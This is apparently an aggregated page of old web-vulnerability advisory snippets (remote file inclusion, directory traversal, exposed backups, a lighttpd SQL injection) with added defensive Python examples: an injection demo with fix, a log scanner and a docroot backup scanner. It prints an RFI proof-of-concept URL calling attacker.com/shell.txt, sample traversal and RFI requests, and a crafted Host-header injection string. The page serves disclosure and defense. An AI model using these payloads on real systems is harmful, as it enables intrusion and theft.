Quick Classifieds 1.0 - controlcenter/remember.php3 DOCUMENT_ROOT Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/28417/info Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the applicati...
Apple Mac OS X Server 10.5 - Wiki Server Directory Traversal Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/28278/info Apple Mac OS X Server Wiki Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. Exploiting this issue allows an attacker to access arbitrary...
Design/Logic Flaw
Mambo CMS 4.6.5 stores the MySQL database password in cleartext in the document root, which allows local users to obtain sensitive information via unspecified vectors...
Directory traversal
PHP-Fusion before 7.02.06 stores backup files with predictable filenames in an unrestricted directory under the web document root, which might allow remote attackers to obtain sensitive information via a direct request to the backup file in administration/dbbackups/...
[SECURITY] [DSA 2877-1] lighttpd security update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ------------------------------------------------------------------------- Debian Security Advisory DSA-2877-1 security@debian.org http://www.debian.org/security/ Michael Gilbert March 12, 2014 http://www.debian.org/security/faq -...
Debian DSA-2877-1 : lighttpd - security update
Several vulnerabilities were discovered in the lighttpd web server. - CVE-2014-2323 Jann Horn discovered that specially crafted host names can be used to inject arbitrary MySQL queries in lighttpd servers using the MySQL virtual hosting module mod_mysql_vhost. This only affects installations with t...
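The CVE-2014-2323 entry describes a hostname reaching a SQL query without escaping. The block below is an added example written for this page, not lighttpd code: the table layout, the lookup query and the sqlite3 backend are assumptions standing in for what mod_mysql_vhost actually does. It shows how a crafted Host header rewrites the vhost lookup when the value is pasted into the SQL text, and the parameter-bound, syntax-checked form that closes the hole.

```python
import re
import sqlite3

# Constructed vhost table; mod_mysql_vhost's real schema and query differ (assumption).
SCHEMA = """
CREATE TABLE domains (domain TEXT PRIMARY KEY, docroot TEXT NOT NULL);
INSERT INTO domains VALUES ('alice.example', '/srv/www/alice');
INSERT INTO domains VALUES ('bob.example',   '/srv/www/bob');
"""

# Syntactic hostname check (RFC 1123 labels). Anything with quotes, spaces or
# SQL punctuation fails here before it gets anywhere near the database.
HOSTNAME_RE = re.compile(
    r'^(?=.{1,253}$)[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?'
    r'(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$', re.I)

# A Host header an attacker can send verbatim; it closes the quoted literal and
# appends its own condition, selecting another tenant's document root.
CRAFTED_HOST = "x' OR docroot LIKE '/srv/www/b%"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def docroot_vulnerable(conn, host):
    """Host header is pasted into the SQL text, so quotes in it rewrite the WHERE clause."""
    sql = "SELECT docroot FROM domains WHERE domain = '%s'" % host
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def docroot_fixed(conn, host):
    """Reject anything that is not a syntactic hostname, then bind the value as a parameter."""
    if not HOSTNAME_RE.match(host):
        return None
    row = conn.execute("SELECT docroot FROM domains WHERE domain = ?", (host,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print(docroot_vulnerable(db, "alice.example"))   # /srv/www/alice
    print(docroot_vulnerable(db, CRAFTED_HOST))      # /srv/www/bob, chosen by the injected clause
    print(docroot_fixed(db, CRAFTED_HOST))           # None
```

Binding alone is enough to stop the injection; the hostname regex is there because a vhost lookup has no business accepting a value that could never be a hostname, and rejecting it early keeps malformed input out of logs and error paths too.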
Improper access control
DFLabs PTK 1.0.5 stores data files with predictable names under the web document root with insufficient access control, which allows remote attackers to read logs, images, or reports via a direct request to the file in the (1) log, (2) images, or (3) report directory...
Apache Mixed Platform AddType Directive Information Disclosure
The remote host appears to be running Apache. When Apache runs on a Unix host with a document root on a Windows SMB share, remote, unauthenticated attackers could obtain the unprocessed contents of the directory. For example, requesting a PHP file with a trailing backslash could display the file'...
CVE-2010-2336
index.php in Yamamah Photo Gallery 1.00 allows remote attackers to obtain the source code of executable files within the web document root via the download parameter...
CVE-2010-2263
nginx 0.8 before 0.8.40 and 0.7 before 0.7.66, when running on Windows, allows remote attackers to obtain source code or unparsed content of arbitrary files under the web document root by appending ::$DATA to the URI...
Automne.ws CMS 4.0.0rc2 Multiple RFI Vulnerability
Exploit for unknown platform in category web applications ================================================== Automne.ws CMS 4.0.0rc2 Multiple RFI Vulnerability ================================================== Automne.ws CMS 4.0.0rc2 Multiple RFI Vulnerability Created By 1nd0n3s14n l4m3r c --...
Power BB 1.8.3 - Remote File Inclusions
Power BB 1.8.3 - Remote File Inclusions Dadaşlar Grup Komutanlığı | HackSpy | Zombie | KroNickq | DigitALL | NoFearx38 | 1923Turk Grup by DigitALL Sites : http://powerwd.net Download : http://www.phpexplorer.com/Goster/536 Download : http://sourceforge.net/projects/pbb/ Power BB 1.8.3 Remote File...
kr-web 1.1b2 - Remote File Inclusion
kr-web 1.1b2 - Remote File Inclusion Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg KR-Web PoC : http://server/path/adm/krgourl.php?DOCUMENTROOT=http://attacker.com/shell.txt?cmd Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix, dan seluruh orang yang membenciku dan menyayangiku I...
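The Quick Classifieds and KR-Web entries pass a remote URL in a DOCUMENT_ROOT-style parameter, the Wiki Server entry is a path traversal, and the nginx and Apache entries rely on a `::$DATA` suffix and a trailing backslash respectively. The block below is an added example written for this page, not code from any of those advisories: it classifies those four request shapes in Apache-style access log lines. The log lines are constructed, the hostnames are placeholders, and the tag names are this example's own.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (common log format, not from a real server).
# "\\" in the Python source is a single backslash in the request line.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Mar/2014:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 512
203.0.113.7 - - [12/Mar/2014:10:01:05 +0000] "GET /adm/krgourl.php?DOCUMENTROOT=http://attacker.example/shell.txt%3Fcmd HTTP/1.1" 200 13
203.0.113.9 - - [12/Mar/2014:10:01:09 +0000] "GET /wiki/..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 0
203.0.113.11 - - [12/Mar/2014:10:01:12 +0000] "GET /config.php::$DATA HTTP/1.1" 200 900
203.0.113.13 - - [12/Mar/2014:10:01:15 +0000] "GET /index.php\\ HTTP/1.1" 200 900
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

# Query values that would make a PHP include() fetch remote code, or reach a
# wrapper; the php:// and data: forms are listed for completeness.
RFI_VALUE_RE = re.compile(r'(?i)^(https?|ftp)://|^(php|data)://')


def classify_request(target):
    """Return the list of suspicious traits found in one request target."""
    tags = []
    parts = urlsplit(target)
    # Decode twice so %252F (double-encoded slash) is caught as well as %2F.
    path = unquote(unquote(parts.path))
    if re.search(r'\.\.[/\\]', path):
        tags.append("traversal")
    if "::$data" in path.lower():          # NTFS alternate data stream suffix
        tags.append("ntfs_ads")
    if path.endswith("\\"):                # trailing backslash, SMB/Windows docroots
        tags.append("trailing_backslash")
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        if RFI_VALUE_RE.match(unquote(value)):
            tags.append("rfi")
            break
    return tags


def scan_log(text):
    """Parse each log line and return (client_ip, target, tags) for flagged requests."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, target, _status = m.groups()
        tags = classify_request(target)
        if tags:
            hits.append((ip, target, tags))
    return hits


if __name__ == "__main__":
    for ip, target, tags in scan_log(SAMPLE_LOG):
        print(ip, ",".join(tags), target)
```

The traversal check runs on the decoded path only; a server that decodes once will see `%2F` as a literal and never traverse, but logging tools see the raw request, so decoding in the detector keeps the same payload from hiding behind encoding. A 404 on the traversal line does not mean the attempt was harmless on every build, which is why status is parsed but not used to suppress a hit.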
CVE-2009-1941
PAD Site Scripts 3.6 stores sensitive information under the web document root with insufficient access control, which allows remote attackers to download the database and obtain sensitive information via a direct request for dbbackup.txt...
CVE-2009-1941
CVE-2009-1941 affects PAD Site Scripts 3.6. The vulnerability arises from storing sensitive information under the web document root with insufficient access control, allowing remote attackers to download the database via a direct request for dbbackup.txt. Impact is consistent with the CVSS v2 bas...
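The PHP-Fusion, DFLabs PTK and PAD Site Scripts entries share one root cause: backup, log or data files with predictable names left under the document root where the web server will hand them out. The block below is an added example written for this page, not code from any of those projects: it walks a document root and lists every file whose name or directory matches a backup-style pattern, which is the check to run before and after deploying such an application. The pattern list is an assumption for the demonstration and should be extended for the stack in use; the sample tree is constructed in a temporary directory.

```python
import os
import re
import tempfile

# Name and directory patterns that commonly mark dumps, backups and data files.
# This list is an assumption made for the example, not an exhaustive rule set.
SENSITIVE_PATTERNS = [
    re.compile(r'\.(sql|bak|old|orig|swp|tar|gz|zip)$', re.I),      # dumps and archives
    re.compile(r'^(db|database|backup|dbbackup)[^/]*\.txt$', re.I),  # e.g. dbbackup.txt
    re.compile(r'(^|/)(dbbackups|backups?|logs?)/', re.I),           # whole directories
    re.compile(r'(^|/)config(uration)?\.php\.(bak|old|~)$', re.I),   # editor copies of config
    re.compile(r'~$'),                                               # emacs/vi backup suffix
]


def exposed_files(docroot):
    """Return web paths (relative to docroot, '/'-separated, sorted) of files matching a pattern."""
    found = []
    for dirpath, _dirs, filenames in os.walk(docroot):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, docroot).replace(os.sep, "/")
            if any(p.search(rel) for p in SENSITIVE_PATTERNS):
                found.append("/" + rel)
    return sorted(found)


def build_sample_docroot():
    """Create a constructed docroot mirroring the layouts described in the entries above."""
    root = tempfile.mkdtemp(prefix="docroot-")
    files = [
        "index.php",
        "images/logo.png",
        "dbbackup.txt",                                     # PAD Site Scripts style
        "administration/dbbackups/backup-2014-03-12.sql",   # PHP-Fusion style
        "configuration.php.bak",
        "log/access.log",                                   # DFLabs PTK style
    ]
    for rel in files:
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
    return root


if __name__ == "__main__":
    root = build_sample_docroot()
    for web_path in exposed_files(root):
        print("would be served:", web_path)
```

Every path the function prints is a URL a client can request directly unless the server configuration denies it, so the durable fix is to write backups outside the document root rather than to deny-list them; the scan is still worth keeping as a deployment check because new application versions and admin tools recreate these directories.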